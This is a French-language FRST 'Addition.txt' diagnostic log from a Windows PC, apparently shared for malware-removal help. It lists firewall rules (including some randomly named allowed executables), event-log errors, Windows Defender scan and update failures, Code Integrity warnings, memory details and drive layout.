HKLM\System\CurrentControlSet\Control\Session Manager\Environment\\Path: C:\ProgramData\Oracle\Java\javapath;C:\Program Files\Broadcom\Broadcom 802.11 Network Adapter;;C:\Program Files (x86)\NVIDIA Corporation\PhysX\Common;C:\Program Files (x86)\Intel\iCLS Client\;C:\Program Files\Intel\iCLS Client\;%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\;C:\Program Files\Intel\Intel(R) Management Engine Components\DAL;C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL;C:\Program Files\Intel\Intel(R) Management Engine Components\IPT;C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT;C:\Program Files\WIDCOMM\Bluetooth Software\;C:\Program Files\WIDCOMM\Bluetooth Software\syswow64;C:\Program Files (x86)\Skype\Phone\;%SYSTEMROOT%\System32\OpenSSH\ HKU\S-1-5-21-1921901940-906816708-456716430-1001\Control Panel\Desktop\\Wallpaper -> c:\windows\web\wallpaper\theme1\img13.jpg DNS Servers: 89.2.0.1 - 89.2.0.2 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1) HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: RequireAdmin) Le Pare-feu est activé. ==================== MSCONFIG/TASK MANAGER éléments désactivés == Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé. ==================== RèglesPare-feu (Avec liste blanche) =============== (Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.) FirewallRules: [UDP Query User{3765BC40-DCA0-4994-8711-1B2B3CE47B79}C:\users\dominique\appdata\roaming\cacaoweb\cacaoweb.exe] => (Block) C:\users\dominique\appdata\roaming\cacaoweb\cacaoweb.exe (CACAOWEB Ltd -> ) FirewallRules: [TCP Query User{582FC80A-157B-4133-9924-A9DA53565C85}C:\users\dominique\appdata\roaming\cacaoweb\cacaoweb.exe] => (Block) C:\users\dominique\appdata\roaming\cacaoweb\cacaoweb.exe (CACAOWEB Ltd -> ) FirewallRules: [UDP Query User{32064965-A681-4DDB-81D2-5B030546B51F}C:\users\dominique\appdata\roaming\cacaoweb\cacaoweb.exe] => (Allow) C:\users\dominique\appdata\roaming\cacaoweb\cacaoweb.exe (CACAOWEB Ltd -> ) FirewallRules: [TCP Query User{D03291D5-EFB1-430B-8419-9D0A8E592CFD}C:\users\dominique\appdata\roaming\cacaoweb\cacaoweb.exe] => (Allow) C:\users\dominique\appdata\roaming\cacaoweb\cacaoweb.exe (CACAOWEB Ltd -> ) FirewallRules: [{77401579-E680-4277-B022-DA2DE666EBCD}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe (NVIDIA Corporation -> NVIDIA Corporation) FirewallRules: [{0304415E-2745-4691-89A8-95577B83D436}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe (NVIDIA Corporation -> NVIDIA Corporation) FirewallRules: [{D48F6F7F-BD46-41F0-BD6B-37F58504FF32}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.) FirewallRules: [{49768E9D-49DE-4BFD-9E74-31EA86D8DB6A}] => (Allow) C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe () [Fichier non signé] FirewallRules: [{6BD65855-AF0F-4D10-9664-92144D5C7C51}] => (Allow) C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe () [Fichier non signé] FirewallRules: [{B7E1B0CC-1BFD-49AD-9204-E3A54BFB836B}] => (Allow) C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe () [Fichier non signé] FirewallRules: [{B1218957-0509-4B34-8A83-5541437DC104}] => (Allow) C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe () [Fichier non signé] FirewallRules: [{EFC82792-79D7-4412-A4E0-6F98FB1CC9D3}] => (Allow) C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe () [Fichier non signé] FirewallRules: [{48F8B990-0382-4EC9-BDAE-79808DB9923D}] => (Allow) C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe () [Fichier non signé] FirewallRules: [TCP Query User{532CEF7A-CF89-47B6-ABBD-3FE9812704A4}C:\users\dominique\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\dominique\appdata\roaming\spotify\spotify.exe Pas de fichier FirewallRules: [UDP Query User{A54277D6-A7A9-4F15-A624-A417EEAC6EBA}C:\users\dominique\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\dominique\appdata\roaming\spotify\spotify.exe Pas de fichier FirewallRules: [{BD8A379C-ACC3-4F09-9B50-56754F0F30D5}] => (Allow) C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe () [Fichier non signé] FirewallRules: [{99C94E5D-688A-4B2A-BB8B-C3ECBD51A59B}] => (Allow) C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe () [Fichier non signé] FirewallRules: [{D76BAF95-9A4B-49A4-B21D-DA345F5109D3}] => (Allow) C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe () [Fichier non signé] FirewallRules: [{E716368A-F9A7-435C-97CE-A2F6006CBD68}] => (Allow) C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe () [Fichier non signé] FirewallRules: [{0FD9827A-C866-401E-BAAE-A419DF93902B}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\outlook.exe (Microsoft Corporation -> Microsoft Corporation) FirewallRules: [TCP Query User{82257AB3-0A9C-4A0D-B1EA-C7480EE80E59}C:\users\dominique\appdata\roaming\utorrent\utorrent.exe] => (Allow) C:\users\dominique\appdata\roaming\utorrent\utorrent.exe (BitTorrent Inc -> BitTorrent Inc.) FirewallRules: [UDP Query User{2A054F5D-1230-49F9-BD35-87F3ECE4062D}C:\users\dominique\appdata\roaming\utorrent\utorrent.exe] => (Allow) C:\users\dominique\appdata\roaming\utorrent\utorrent.exe (BitTorrent Inc -> BitTorrent Inc.) FirewallRules: [{0F26B88C-CE0E-4CB9-A12D-007B836EBE71}] => (Allow) C:\Users\dominique\AppData\Local\Programs\Opera\57.0.3098.76\opera.exe Pas de fichier FirewallRules: [{0DCC9A58-1412-4177-8CC1-BD8EA8C21786}] => (Allow) C:\Program Files\AVAST Software\Avast\AvEmUpdate.exe Pas de fichier FirewallRules: [{177A6525-41D6-4914-8BA4-AFB5981A2264}] => (Allow) C:\Program Files\AVAST Software\Avast\AvEmUpdate.exe Pas de fichier FirewallRules: [{1B5A7EB6-DF93-47B0-A5D3-99728737DC3C}] => (Allow) C:\Program Files\CCleaner\CCUpdate.exe (Piriform Software Ltd -> Piriform Software Ltd) FirewallRules: [{55809C64-8EF3-4C26-8341-89718279FBBA}] => (Allow) C:\Program Files\CCleaner\CCUpdate.exe (Piriform Software Ltd -> Piriform Software Ltd) FirewallRules: [TCP Query User{D1DFC91E-C755-4270-A092-B3C3C41C48C5}D:\shadowrun returns\shadowrun.exe] => (Block) D:\shadowrun returns\shadowrun.exe () [Fichier non signé] FirewallRules: [UDP Query User{2302C381-63B7-4AA3-A079-90BC6BCC022A}D:\shadowrun returns\shadowrun.exe] => (Block) D:\shadowrun returns\shadowrun.exe () [Fichier non signé] FirewallRules: [TCP Query User{1B1536BC-3C63-4FF7-9542-9B0D32E4320C}D:\pathfinder kingmaker\kingmaker.exe] => (Block) D:\pathfinder kingmaker\kingmaker.exe () [Fichier non signé] FirewallRules: [UDP Query User{48ACE9E8-9D06-4889-92C5-68F1506DFB28}D:\pathfinder kingmaker\kingmaker.exe] => (Block) D:\pathfinder kingmaker\kingmaker.exe () [Fichier non signé] FirewallRules: [{59530672-A056-4726-9FEE-0BD9FF037445}] => (Allow) C:\WINDOWS\SysWOW64\msiexec.exe (Microsoft Windows -> Microsoft Corporation) FirewallRules: [{0CF231B1-D2A0-4F9F-B01D-185E2EA71334}] => (Allow) C:\Program Files (x86)\Common Files\aeYorr.exe (Microsoft Windows -> Microsoft Corporation) FirewallRules: [{8D947191-4320-4717-A40E-1ADB992BBF64}] => (Allow) C:\Users\dominique\AppData\Local\zyUEhi.exe (Microsoft Windows -> Microsoft Corporation) FirewallRules: [{2F33F8C9-6412-478C-A88D-E79C36C44D72}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Windows -> Microsoft Corporation) FirewallRules: [TCP Query User{391AA328-7B91-4CFB-9C2C-4CC969D0BB94}C:\games\pathfinder kingmaker\kingmaker.exe] => (Block) C:\games\pathfinder kingmaker\kingmaker.exe () [Fichier non signé] FirewallRules: [UDP Query User{86E15D73-24C1-4EBA-80AF-98831200CCB6}C:\games\pathfinder kingmaker\kingmaker.exe] => (Block) C:\games\pathfinder kingmaker\kingmaker.exe () [Fichier non signé] FirewallRules: [{E87331BE-9A18-4ACA-AB20-6F08FD18E004}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC -> Google Inc.) ==================== Points de restauration ========================= 23-02-2019 15:31:54 Point de contrôle planifié 02-03-2019 01:49:32 Windows Update 12-03-2019 15:54:49 Point de contrôle planifié ==================== Éléments en erreur du Gestionnaire de périphériques ============= ==================== Erreurs du Journal des événements: ========================= Erreurs Application: ================== Error: (03/13/2019 01:56:45 PM) (Source: Application Hang) (EventID: 1002) (User: ) Description: Le programme chrome.exe version 72.0.3626.121 a cessé d'interagir avec Windows et a été fermé. Pour déterminer si des informations supplémentaires sont disponibles, consultez l'historique du problème dans le panneau de configuration Sécurité et maintenance. ID de processus : 170 Heure de début : 01d4d9975c176599 Heure de fin : 410 Chemin d'accès de l'application : C:\Program Files (x86)\Google\Chrome\Application\chrome.exe ID de rapport : f01d8aeb-64ce-41ca-b5ee-1b0598cbda11 Nom complet du package défaillant : ID de l'application relative au package défaillant : Error: (03/13/2019 01:01:17 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Nom de l’application défaillante AGSService.exe, version : 6.2.0.190, horodatage : 0x5c11fc87 Nom du module défaillant : AGSService.exe, version : 6.2.0.190, horodatage : 0x5c11fc87 Code d’exception : 0xc0000005 Décalage d’erreur : 0x000977ba ID du processus défaillant : 0xd88 Heure de début de l’application défaillante : 0x01d4d42f19ecf76e Chemin d’accès de l’application défaillante : C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe Chemin d’accès du module défaillant: C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe ID de rapport : b6b3325a-831d-4778-89d7-9b72a316a152 Nom complet du package défaillant : ID de l’application relative au package défaillant : Error: (03/13/2019 12:31:59 PM) (Source: Application Hang) (EventID: 1002) (User: ) Description: Le programme chrome.exe version 72.0.3626.121 a cessé d'interagir avec Windows et a été fermé. Pour déterminer si des informations supplémentaires sont disponibles, consultez l'historique du problème dans le panneau de configuration Sécurité et maintenance. ID de processus : 2f50 Heure de début : 01d4d98ac9607743 Heure de fin : 154 Chemin d'accès de l'application : C:\Program Files (x86)\Google\Chrome\Application\chrome.exe ID de rapport : 0c1d627a-0fc5-4786-b0ba-f8c3518ac112 Nom complet du package défaillant : ID de l'application relative au package défaillant : Error: (03/13/2019 10:16:16 AM) (Source: Perflib) (EventID: 1008) (User: ) Description: Échec de la procédure d’ouverture pour le service « WmiApRpl » dans la DLL « C:\WINDOWS\system32\wbem\wmiaprpl.dll ». Les données de performance de ce service ne seront pas disponibles. Le premier mot (DWORD) de la section Données contient le code d’erreur. Error: (03/13/2019 10:16:14 AM) (Source: Perflib) (EventID: 1023) (User: ) Description: Windows ne parvient pas à charger la DLL de compteur extensible rdyboost. Le premier mot (DWORD) de la section Données contient le code d’erreur Windows. Error: (03/13/2019 10:16:13 AM) (Source: PerfNet) (EventID: 2004) (User: ) Description: Impossible d’ouvrir l’objet de performance pour le service Serveur. Les quatre premiers octets (DWORD) de la section Data contiennent le code d’état. Error: (03/13/2019 10:16:13 AM) (Source: Perflib) (EventID: 1008) (User: ) Description: Échec de la procédure d’ouverture pour le service « MSDTC » dans la DLL « C:\WINDOWS\system32\msdtcuiu.DLL ». Les données de performance de ce service ne seront pas disponibles. Le premier mot (DWORD) de la section Données contient le code d’erreur. Error: (03/13/2019 10:16:12 AM) (Source: Perflib) (EventID: 1008) (User: ) Description: Échec de la procédure d’ouverture pour le service « Lsa » dans la DLL « C:\Windows\System32\Secur32.dll ». Les données de performance de ce service ne seront pas disponibles. Le premier mot (DWORD) de la section Données contient le code d’erreur. Erreurs système: ============= Error: (03/13/2019 03:09:21 PM) (Source: DCOM) (EventID: 10016) (User: AUTORITE NT) Description: Les paramètres d’autorisation propres à l’application n’accordent pas l’autorisation Local Activation pour l’application serveur COM avec le CLSID {D63B10C5-BB46-4990-A94F-E40B9D520160} et l’APPID {9CA88EE3-ACB7-47C8-AFC4-AB702511C276} au SID AUTORITE NT\SERVICE LOCAL de l’utilisateur (S-1-5-19) depuis l’adresse LocalHost (avec LRPC) s’exécutant dans le SID Non disponible du conteneur d’applications (Non disponible). Cette autorisation de sécurité peut être modifiée à l’aide de l’outil d’administration Services de composants. Error: (03/13/2019 03:04:40 PM) (Source: DCOM) (EventID: 10016) (User: PC-SIMON) Description: Les paramètres d’autorisation propres à l’application n’accordent pas l’autorisation Local Activation pour l’application serveur COM avec le CLSID {D63B10C5-BB46-4990-A94F-E40B9D520160} et l’APPID {9CA88EE3-ACB7-47C8-AFC4-AB702511C276} au SID PC-SIMON\Simon de l’utilisateur (S-1-5-21-1921901940-906816708-456716430-1001) depuis l’adresse LocalHost (avec LRPC) s’exécutant dans le SID Non disponible du conteneur d’applications (Non disponible). Cette autorisation de sécurité peut être modifiée à l’aide de l’outil d’administration Services de composants. Error: (03/13/2019 02:20:16 PM) (Source: DCOM) (EventID: 10016) (User: PC-SIMON) Description: Les paramètres d’autorisation propres à l’application n’accordent pas l’autorisation Local Activation pour l’application serveur COM avec le CLSID {D63B10C5-BB46-4990-A94F-E40B9D520160} et l’APPID {9CA88EE3-ACB7-47C8-AFC4-AB702511C276} au SID PC-SIMON\Simon de l’utilisateur (S-1-5-21-1921901940-906816708-456716430-1001) depuis l’adresse LocalHost (avec LRPC) s’exécutant dans le SID Non disponible du conteneur d’applications (Non disponible). Cette autorisation de sécurité peut être modifiée à l’aide de l’outil d’administration Services de composants. Error: (03/13/2019 01:59:53 PM) (Source: DCOM) (EventID: 10016) (User: PC-SIMON) Description: Les paramètres d’autorisation propres à l’application n’accordent pas l’autorisation Local Activation pour l’application serveur COM avec le CLSID {D63B10C5-BB46-4990-A94F-E40B9D520160} et l’APPID {9CA88EE3-ACB7-47C8-AFC4-AB702511C276} au SID PC-SIMON\Simon de l’utilisateur (S-1-5-21-1921901940-906816708-456716430-1001) depuis l’adresse LocalHost (avec LRPC) s’exécutant dans le SID Non disponible du conteneur d’applications (Non disponible). Cette autorisation de sécurité peut être modifiée à l’aide de l’outil d’administration Services de composants. Error: (03/13/2019 01:56:46 PM) (Source: DCOM) (EventID: 10016) (User: PC-SIMON) Description: Les paramètres d’autorisation propres à l’application n’accordent pas l’autorisation Local Activation pour l’application serveur COM avec le CLSID {D63B10C5-BB46-4990-A94F-E40B9D520160} et l’APPID {9CA88EE3-ACB7-47C8-AFC4-AB702511C276} au SID PC-SIMON\Simon de l’utilisateur (S-1-5-21-1921901940-906816708-456716430-1001) depuis l’adresse LocalHost (avec LRPC) s’exécutant dans le SID Non disponible du conteneur d’applications (Non disponible). Cette autorisation de sécurité peut être modifiée à l’aide de l’outil d’administration Services de composants. Error: (03/13/2019 01:42:01 PM) (Source: DCOM) (EventID: 10016) (User: PC-SIMON) Description: Les paramètres d’autorisation propres à l’application n’accordent pas l’autorisation Local Activation pour l’application serveur COM avec le CLSID {D63B10C5-BB46-4990-A94F-E40B9D520160} et l’APPID {9CA88EE3-ACB7-47C8-AFC4-AB702511C276} au SID PC-SIMON\Simon de l’utilisateur (S-1-5-21-1921901940-906816708-456716430-1001) depuis l’adresse LocalHost (avec LRPC) s’exécutant dans le SID Non disponible du conteneur d’applications (Non disponible). Cette autorisation de sécurité peut être modifiée à l’aide de l’outil d’administration Services de composants. Error: (03/13/2019 01:22:53 PM) (Source: DCOM) (EventID: 10016) (User: PC-SIMON) Description: Les paramètres d’autorisation propres à l’application n’accordent pas l’autorisation Local Activation pour l’application serveur COM avec le CLSID {D63B10C5-BB46-4990-A94F-E40B9D520160} et l’APPID {9CA88EE3-ACB7-47C8-AFC4-AB702511C276} au SID PC-SIMON\Simon de l’utilisateur (S-1-5-21-1921901940-906816708-456716430-1001) depuis l’adresse LocalHost (avec LRPC) s’exécutant dans le SID Non disponible du conteneur d’applications (Non disponible). Cette autorisation de sécurité peut être modifiée à l’aide de l’outil d’administration Services de composants. Error: (03/13/2019 01:02:15 PM) (Source: Service Control Manager) (EventID: 7034) (User: ) Description: Le service Adobe Genuine Software Integrity Service s’est terminé de façon inattendue pour la 1ème fois. Windows Defender: =================================== Date: 2019-03-06 23:28:16.475 Description: L’analyse Antivirus Windows Defender a été arrêtée avant la fin. ID de l’analyse : {F9458464-801E-40F9-89DD-3217F3FDEFCE} Type de l’analyse : Logiciel anti-programme malveillant Paramètres de l’analyse : Analyse rapide Utilisateur : AUTORITE NT\Système Date: 2019-03-06 23:06:11.062 Description: L’analyse Antivirus Windows Defender a été arrêtée avant la fin. ID de l’analyse : {BD68187A-4EDF-4F8A-8C15-14968EED77F0} Type de l’analyse : Logiciel anti-programme malveillant Paramètres de l’analyse : Analyse rapide Utilisateur : AUTORITE NT\Système Date: 2019-03-04 22:33:45.756 Description: L’analyse Antivirus Windows Defender a été arrêtée avant la fin. ID de l’analyse : {EB9AB45B-837A-4896-A232-6D618332A194} Type de l’analyse : Logiciel anti-programme malveillant Paramètres de l’analyse : Analyse rapide Utilisateur : AUTORITE NT\Système Date: 2019-03-04 21:04:19.391 Description: L’analyse Antivirus Windows Defender a été arrêtée avant la fin. ID de l’analyse : {BACA2250-FB58-400B-8C29-F6D4BE8EAC7E} Type de l’analyse : Logiciel anti-programme malveillant Paramètres de l’analyse : Analyse rapide Utilisateur : AUTORITE NT\Système Date: 2019-02-24 20:09:46.755 Description: L’analyse Antivirus Windows Defender a été arrêtée avant la fin. ID de l’analyse : {0E624717-069F-4FEB-B5AB-18BA54BF394F} Type de l’analyse : Logiciel anti-programme malveillant Paramètres de l’analyse : Analyse rapide Utilisateur : AUTORITE NT\Système Date: 2019-03-02 01:52:45.519 Description: Antivirus Windows Defender a rencontré une erreur lors d la mise à jour des signatures. Nouvelle version de la signature : Version précédente de la signature : 1.289.134.0 Source de mise à jour : Serveur Microsoft Update Type de signature : Anti-virus Type de mise à jour : Complet Utilisateur : AUTORITE NT\Système Version actuelle du moteur : Version précédente du moteur : 1.1.15700.9 Code d’erreur : 0x80240016 Description de l’erreur : Un problème inattendu s’est produit lors de la vérification des mises à jour. Pour plus d’informations sur l’installation ou la résolution des problèmes de mise à jour, voir Aide et support. Date: 2019-02-27 20:58:35.688 Description: Antivirus Windows Defender a rencontré une erreur lors d la mise à jour des signatures. Nouvelle version de la signature : Version précédente de la signature : 1.287.803.0 Source de mise à jour : Serveur Microsoft Update Type de signature : Anti-virus Type de mise à jour : Complet Utilisateur : AUTORITE NT\Système Version actuelle du moteur : Version précédente du moteur : 1.1.15700.9 Code d’erreur : 0x80240016 Description de l’erreur : Un problème inattendu s’est produit lors de la vérification des mises à jour. Pour plus d’informations sur l’installation ou la résolution des problèmes de mise à jour, voir Aide et support. Date: 2019-02-17 22:47:21.194 Description: Antivirus Windows Defender a rencontré une erreur lors d la mise à jour des signatures. Nouvelle version de la signature : Version précédente de la signature : 1.287.189.0 Source de mise à jour : Serveur Microsoft Update Type de signature : Anti-virus Type de mise à jour : Complet Utilisateur : AUTORITE NT\Système Version actuelle du moteur : Version précédente du moteur : 1.1.15700.8 Code d’erreur : 0x80240016 Description de l’erreur : Un problème inattendu s’est produit lors de la vérification des mises à jour. Pour plus d’informations sur l’installation ou la résolution des problèmes de mise à jour, voir Aide et support. Date: 2019-02-15 16:44:50.409 Description: Antivirus Windows Defender a rencontré une erreur lors d la mise à jour des signatures. Nouvelle version de la signature : Version précédente de la signature : 1.285.1292.0 Source de mise à jour : Serveur Microsoft Update Type de signature : Anti-virus Type de mise à jour : Complet Utilisateur : AUTORITE NT\Système Version actuelle du moteur : Version précédente du moteur : 1.1.15700.8 Code d’erreur : 0x80240016 Description de l’erreur : Un problème inattendu s’est produit lors de la vérification des mises à jour. Pour plus d’informations sur l’installation ou la résolution des problèmes de mise à jour, voir Aide et support. Date: 2018-12-27 22:23:42.356 Description: Antivirus Windows Defender a rencontré une erreur lors d la mise à jour des signatures. Nouvelle version de la signature : Version précédente de la signature : 1.283.1639.0 Source de mise à jour : Serveur Microsoft Update Type de signature : Anti-virus Type de mise à jour : Complet Utilisateur : AUTORITE NT\Système Version actuelle du moteur : Version précédente du moteur : 1.1.15500.2 Code d’erreur : 0x80240016 Description de l’erreur : Un problème inattendu s’est produit lors de la vérification des mises à jour. Pour plus d’informations sur l’installation ou la résolution des problèmes de mise à jour, voir Aide et support. CodeIntegrity: =================================== Date: 2019-03-13 15:24:27.509 Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\browser_broker.exe) attempted to load \Device\HarddiskVolume4\Program Files\Common Files\Apple\Internet Services\ShellStreams64.dll that did not meet the Microsoft signing level requirements. Date: 2019-03-05 19:22:10.182 Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\browser_broker.exe) attempted to load \Device\HarddiskVolume4\Program Files\Common Files\Apple\Internet Services\ShellStreams64.dll that did not meet the Microsoft signing level requirements. Date: 2019-03-04 14:45:04.237 Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\browser_broker.exe) attempted to load \Device\HarddiskVolume4\Program Files\Common Files\Apple\Internet Services\ShellStreams64.dll that did not meet the Microsoft signing level requirements. Date: 2019-03-02 12:15:35.890 Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\browser_broker.exe) attempted to load \Device\HarddiskVolume4\Program Files\Common Files\Apple\Internet Services\ShellStreams64.dll that did not meet the Microsoft signing level requirements. Date: 2019-02-27 21:07:35.698 Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\browser_broker.exe) attempted to load \Device\HarddiskVolume4\Program Files\Common Files\Apple\Internet Services\ShellStreams64.dll that did not meet the Microsoft signing level requirements. Date: 2019-02-23 15:21:31.124 Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\browser_broker.exe) attempted to load \Device\HarddiskVolume4\Program Files\Common Files\Apple\Internet Services\ShellStreams64.dll that did not meet the Microsoft signing level requirements. Date: 2019-02-22 00:11:39.916 Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\browser_broker.exe) attempted to load \Device\HarddiskVolume4\Program Files\Common Files\Apple\Internet Services\ShellStreams64.dll that did not meet the Microsoft signing level requirements. Date: 2019-02-20 15:22:15.910 Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\browser_broker.exe) attempted to load \Device\HarddiskVolume4\Program Files\Common Files\Apple\Internet Services\ShellStreams64.dll that did not meet the Microsoft signing level requirements. ==================== Infos Mémoire =========================== Processeur: Intel(R) Core(TM) i3-5010U CPU @ 2.10GHz Pourcentage de mémoire utilisée: 72% Mémoire physique - RAM - totale: 3998.8 MB Mémoire physique - RAM - disponible: 1116.34 MB Mémoire virtuelle totale: 11648.75 MB Mémoire virtuelle disponible: 7798.76 MB ==================== Lecteurs ================================ Drive c: (OS) (Fixed) (Total:372.6 GB) (Free:60.53 GB) NTFS ==>[système avec composants d'amorçage (obtenu depuis lecteur)] Drive d: (Data) (Fixed) (Total:542.8 GB) (Free:305.24 GB) NTFS \\?\Volume{cdeea108-4301-4281-a501-e32cf919b608}\ (Recovery) (Fixed) (Total:0.88 GB) (Free:0.59 GB) NTFS \\?\Volume{3bb221d7-d1e0-491b-9736-40905b73ce5a}\ (Restore) (Fixed) (Total:15.01 GB) (Free:3.34 GB) NTFS \\?\Volume{ee1c1392-c453-4f6b-ad5d-0ad692ecf95a}\ (SYSTEM) (Fixed) (Total:0.09 GB) (Free:0.07 GB) FAT32 \\?\Volume{f91f6b9d-5fad-11e6-827b-acb57dad8b3f}\ () (CDROM) (Total:0 GB) (Free:0 GB) ==================== MBR & Table des partitions ================== ======================================================== Disk: 0 (Size: 931.5 GB) (Disk ID: 152299EE) Partition: GPT. ==================== Fin de Addition.txt ============================